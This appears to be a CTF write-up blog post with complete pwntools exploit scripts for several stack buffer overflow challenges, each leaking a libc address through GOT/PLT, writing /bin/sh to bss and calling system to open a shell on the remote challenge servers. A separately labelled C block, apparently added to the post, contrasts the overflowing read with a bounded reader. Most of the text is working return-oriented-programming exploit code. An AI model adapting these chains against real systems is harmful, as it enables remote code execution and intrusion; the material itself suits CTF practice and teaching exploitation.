A buffer overflow occurs in the your_turn function.

We receive output up to the your_turn function, send a payload that uses puts inside your_turn to print the real address of puts, and then have it run your_turn again.

r.recvuntil("(1-3)\n")

rdi_rsi_rdx = 0x000000000040087a
rdi = 0x0000000000400bc3

payload = 'A' * (0xB0 + 8)
payload += p64(rdi)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(e.sym['your_turn'])

r.sendline(payload)

Receive up to "Don't break the rules...:(\n", then take the bytes received before the next "\n" and unpack them with u64.

r.recvuntil(":(")
r.recvuntil("\x0a")
puts_hex = r.recvuntil('\x0a')[:-1]
_puts = u64(puts_hex.ljust(8, '\x00'))
print("puts: ", puts_hex, _puts)

Then subtract the library's puts offset from the leaked puts address to get the libc base, compute the address of system from it, write /bin/sh into the bss area, and call system("/bin/sh").

_base = _puts - libc.sym['puts']
_system = _base + libc.sym['system']
_binsh = e.bss() + 0x10

payload = ""
payload += "A" * (0x40) + "B" * 8
payload += p64(rdi_rsi_rdx)
payload += p64(0)
payload += p64(_binsh)
payload += p64(0x10)
payload += p64(e.plt['read'])
payload += p64(e.sym['your_turn'])

r.sendline(payload)
r.sendline('/bin/sh\x00')

payload = 'A' * (0xB0 + 8)
payload += p64(rdi)
payload += p64(_binsh)
payload += p64(_system)

r.sendline(payload)

Full code

from pwn import *

context.log_level = 'debug'

e = ELF('./BaskinRobins31')
r = remote("sunrin.site", 9008)
libc = ELF('./libc.so.6')

r.recvuntil("(1-3)\n")

rdi_rsi_rdx = 0x000000000040087a
rdi = 0x0000000000400bc3

payload = 'A' * (0xB0 + 8)
payload += p64(rdi)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(e.sym['your_turn'])

r.sendline(payload)

r.recvuntil(":(")
r.recvuntil("\x0a")
puts_hex = r.recvuntil('\x0a')[:-1]
_puts = u64(puts_hex.ljust(8, '\x00'))
print("puts: ", puts_hex, _puts)

_base = _puts - libc.sym['puts']
_system = _base + libc.sym['system']
_binsh = e.bss() + 0x10

payload = ""
payload += "A" * (0x40) + "B" * 8
payload += p64(rdi_rsi_rdx)
payload += p64(0)
payload += p64(_binsh)
payload += p64(0x10)
payload += p64(e.plt['read'])
payload += p64(e.sym['your_turn'])

r.sendline(payload)
r.sendline('/bin/sh\x00')

payload = 'A' * (0xB0 + 8)
payload += p64(rdi)
payload += p64(_binsh)
payload += p64(_system)

r.sendline(payload)

r.interactive()
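The bug class this chain starts from, shown as an added C example that is not part of the original post and not the challenge's source: a fixed-size stack buffer filled by a read() whose length is larger than the buffer, beside a bounded reader that stops input from ever reaching the saved frame pointer and return address. The function your_turn_vulnerable, its BUF_SIZE of 0xB0 (chosen to match the 0xB0 + 8 padding above), read_bounded and demo_bounded are all assumptions made for this illustration; demo_bounded pushes a constructed input through a pipe so the block runs offline.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Stack buffer size assumed here to match the 0xB0 bytes of padding the
 * chain above writes before reaching the saved rbp and return address. */
#define BUF_SIZE 0xB0

/* Vulnerable pattern (illustrative reconstruction, not the challenge's real
 * source): the length handed to read() comes from the caller and is larger
 * than the buffer (the original passes something like 0x200), so the bytes
 * after the first 0xB0 overwrite the saved frame pointer and the return
 * address, which is what the ROP payloads rely on. Kept for comparison only;
 * nothing below calls it. */
ssize_t your_turn_vulnerable(int fd, size_t len) {
    char buf[BUF_SIZE];
    return read(fd, buf, len);   /* len > sizeof buf: stack overflow */
}

/* Result of a bounded read: how many bytes were kept and whether the input
 * was longer than the buffer could hold. */
typedef struct {
    size_t kept;
    int truncated;
} read_result;

/* Hardened form: read at most cap - 1 bytes so there is always room for a
 * terminator, NUL-terminate, then drain and flag any leftover input so the
 * caller can reject over-long input instead of silently cutting it. */
read_result read_bounded(int fd, char *buf, size_t cap) {
    read_result res = {0, 0};
    char drain[64];
    ssize_t n, extra;

    if (cap == 0)
        return res;
    n = read(fd, buf, cap - 1);
    if (n < 0)
        n = 0;
    buf[n] = '\0';
    res.kept = (size_t)n;
    while ((extra = read(fd, drain, sizeof drain)) > 0)
        res.truncated = 1;
    return res;
}

/* Push a constructed input of input_len 'A' bytes through a pipe and read it
 * back with read_bounded into a BUF_SIZE buffer. Over-long input is kept to
 * BUF_SIZE - 1 bytes and flagged; short input is kept whole. */
read_result demo_bounded(size_t input_len) {
    read_result res = {0, 0};
    int fds[2];
    char buf[BUF_SIZE];
    char *input;
    ssize_t written;

    if (pipe(fds) != 0)
        return res;
    input = malloc(input_len ? input_len : 1);
    memset(input, 'A', input_len);
    written = write(fds[1], input, input_len);
    (void)written;
    close(fds[1]);                      /* EOF lets the drain loop finish */
    res = read_bounded(fds[0], buf, sizeof buf);
    close(fds[0]);
    free(input);
    return res;
}

int main(void) {
    /* Same shape as the overflow payload: padding, saved rbp, gadgets. */
    read_result r = demo_bounded(BUF_SIZE + 8 + 32);
    printf("kept %zu bytes, truncated=%d\n", r.kept, r.truncated);
    return 0;
}
```

With the bounded reader, the 0xB0 + 8 bytes of padding plus the gadget addresses never reach the stack frame: the buffer keeps 0xAF bytes, the rest is drained and reported as truncated, and an input that is exactly one byte too long (0xB0 bytes) is flagged as well.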

This one has been changed to 64-bit.

from pwn import *

context.log_level = 'debug'

e = ELF('./rop64_v2')
p = remote("sunrin.site", 9007)
libc = ELF('./libc.so.6')

prdi = 0x00000000004005f3
prsir15 = 0x00000000004005f1
pppret = 0x080486b9

payload = 'A' * (0x10 + 8)
payload += p64(prdi)
payload += p64(1)
payload += p64(prsir15)
payload += p64(e.got['write'])
payload += 'A' * 8
payload += p64(e.plt['write'])
payload += p64(e.sym['main'])

p.sendlineafter("World\n", payload)

_write = u64(p.recvuntil('\x7f').ljust(8, '\x00'))
base = _write - libc.symbols['write']
system = base + libc.sym['system']
binsh = e.bss() + 0x10

payload = 'A' * (0x10 + 8)
payload += p64(prdi)
payload += p64(0)
payload += p64(prsir15)
payload += p64(binsh)
payload += 'A' * 8
payload += p64(e.plt['read'])
payload += p64(e.sym['main'])

p.sendline(payload)
p.sendline('/bin/sh\x00')

payload = 'A' * (0x10 + 8)
payload += p64(prdi)
payload += p64(binsh)
payload += p64(system)

p.sendline(payload)

p.interactive()

What changed from rop32 is that the function's address has to be put in as a raw value and that the write function has to be used.

from pwn import *

context.log_level = 'debug'

e = ELF('./ropasaurusrex')
r = remote('sunrin.site', 9005)
libc = ELF('./libc.so.6')

pppret = 0x080484b6

payload = 'A' * (0x88 + 4)
payload += p32(e.plt['write'])
payload += p32(pppret)
payload += p32(1)
payload += p32(e.got['write'])
payload += p32(0x4)
payload += p32(0x804841d)

r.sendline(payload)

_write = u32(r.recvuntil('\xf7'))
_base = _write - libc.sym['write']
_system = _base + libc.sym['system']
_binsh = e.bss() + 0x10

payload = 'A' * (0x88 + 4)
payload += p32(e.plt['read'])
payload += p32(pppret)
payload += p32(0)
payload += p32(_binsh)
payload += p32(0x20)
payload += p32(0x804841d)

r.sendline(payload)

r.sendline('/bin/sh\x00')

payload = 'A' * (0x88 + 4)
payload += p32(_system)
payload += 'A' * 4
payload += p32(_binsh)

r.sendline(payload)

r.interactive()

Compared to the rop32 challenge, only the buffer size and the function differ.

from pwn import *

context.log_level = 'debug'

e = ELF('./rop32_v2')
p = remote("sunrin.site", 9004)
libc = ELF('./libc.so.6')

pret = 0x080486bb
pppret = 0x080486b9

payload = 'A' * (0x24 + 4)
payload += p32(e.plt['puts'])
payload += p32(pret)
payload += p32(e.got['puts'])
payload += p32(e.sym['vuln'])

p.sendlineafter(": \n", payload)

puts = u32(p.recvuntil('\xf7'))

base = puts - libc.sym['puts']
system = base + libc.sym['system']
binsh = e.bss() + 0x10

payload = 'A' * (0x24 + 4)
payload += p32(e.plt['read'])
payload += p32(pppret)
payload += p32(0)
payload += p32(binsh)
payload += p32(0x20)
payload += p32(e.sym['vuln'])

p.sendline(payload)

p.sendline('/bin/sh\x00')

payload = 'A' * (0x24 + 4)
payload += p32(system)
payload += 'A' * 4
payload += p32(binsh)

p.sendline(payload)

p.interactive()

Since it is not much different from the previous challenges, it can be solved easily.

Use printf to print the real address of printf, then run the vuln function again.

payload = 'A' * (0x3A + 4)
payload += p32(e.plt['printf'])
payload += p32(popret)
payload += p32(e.got['printf'])
payload += p32(e.sym['vuln'])

p.sendlineafter(": ", payload)

Receive the real address of printf and compute the libc base.

printf = u32(p.recvuntil('\xf7'))

base = printf - libc.symbols['printf']
system = base + libc.symbols['system']

Put /bin/sh into the bss.

binsh = e.bss() + 0x10

payload = 'A' * (0x3A + 4)
payload += p32(e.plt['read'])
payload += p32(pppret)
payload += p32(0)
payload += p32(binsh)
payload += p32(0x20)
payload += p32(e.sym['vuln'])

p.sendline(payload)

p.sendline('/bin/sh\x00')

Execute system("/bin/sh").

payload = 'A' * (0x3a + 4)
payload += p32(system)
payload += 'A' * 4
payload += p32(binsh)

p.sendline(payload)

Full code

from pwn import *

context.log_level = 'debug'

#e = ELF('./leak_libc')
#p = process('./leak_libc')

e = ELF('./rop32')
p = remote("sunrin.site", 9003)
libc = ELF('./libc.so.6')

pdecimal = libc.search("%d\x00").next()

popret = 0x08048331
poppopret = 0x0804855a
pppret = 0x08048559

payload = 'A' * (0x3A + 4)
payload += p32(e.plt['printf'])
payload += p32(popret)
payload += p32(e.got['printf'])
payload += p32(e.sym['vuln'])

p.sendlineafter(": ", payload)

printf = u32(p.recvuntil('\xf7'))

base = printf - libc.symbols['printf']
system = base + libc.symbols['system']
binsh = e.bss() + 0x10

payload = 'A' * (0x3A + 4)
payload += p32(e.plt['read'])
payload += p32(pppret)
payload += p32(0)
payload += p32(binsh)
payload += p32(0x20)
payload += p32(e.sym['vuln'])

p.sendline(payload)

p.sendline('/bin/sh\x00')

payload = 'A' * (0x3a + 4)
payload += p32(system)
payload += 'A' * 4
payload += p32(binsh)

p.sendline(payload)

p.interactive()

# -*- coding: utf-8 -*-
from pwn import *

context.log_level = 'debug'

e = ELF("./libc.so.6")
r = remote('ctf.j0n9hyun.xyz', 3015)
#r = process("./rtlcore")

#gdb.attach(r)

hashcode = 0x0C0D9B0A7

value = hashcode // 5
remain = hashcode % 5

print(value, 0x2691f021)
payload = p32(value) * 4 + p32(value + remain)

r.sendlineafter(': ', payload)
r.recvuntil("바로 ")
_printf = int(r.recv(10), 16)
_base = _printf - e.symbols['printf']
_system = _base + e.symbols['system']
_binsh = _base + e.search("/bin/sh").next()

print(_base)
print(_base - _system)
print(_base - _binsh)

payload = 'A' * (0x3E + 4)
payload += p32(_system)
payload += 'A' * 4
payload += p32(_binsh)

r.sendline(payload)

r.interactive()

Looking at the code, I wrote the code for this part and passed the check; when I checked the value returned after passing it, it was the printf function, so I computed the libc base, then the address of system and the address of /bin/sh from it, and built the payload.
